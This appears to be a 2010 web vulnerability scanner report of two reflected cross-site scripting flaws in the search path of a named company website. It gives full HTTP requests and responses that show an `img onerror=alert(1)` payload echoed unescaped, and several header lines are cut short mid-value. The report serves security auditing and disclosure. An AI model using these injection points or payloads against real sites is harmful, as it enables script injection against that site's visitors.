1. Cross-site scripting (reflected)
1.1. http://www.exigenservices.com/search/node/%27%27 [REST URL parameter 1]
1.2. http://www.exigenservices.com/search/node/%27%27 [REST URL parameter 2]
Severity: | High |
Confidence: | Certain |
Host: | http://www.exigenservices |
Path: | /search/node/%27%27 |
GET /search9b7d0--><img%20src%3da Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://www.exigenservices Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: www.exigenservices.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: SESSb39148e57f30e3ee |
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 18:56:27 GMT Server: Apache/2.2.3 (CentOS) Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Tue, 09 Nov 2010 18:56:27 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 8650 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Page ...[SNIP]... <a href="/search9b7d0--><img src=a onerror=alert(1) ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.exigenservices |
Path: | /search/node/%27%27 |
GET /search/nodea5d15--><img%20src%3da Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://www.exigenservices Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: www.exigenservices.com Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: SESSb39148e57f30e3ee |
HTTP/1.1 200 OK Date: Tue, 09 Nov 2010 18:57:17 GMT Server: Apache/2.2.3 (CentOS) Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Tue, 09 Nov 2010 18:57:17 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25691 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Searc ...[SNIP]... <a href="/search/nodea5d15--><img src=a onerror=alert(1) ...[SNIP]... |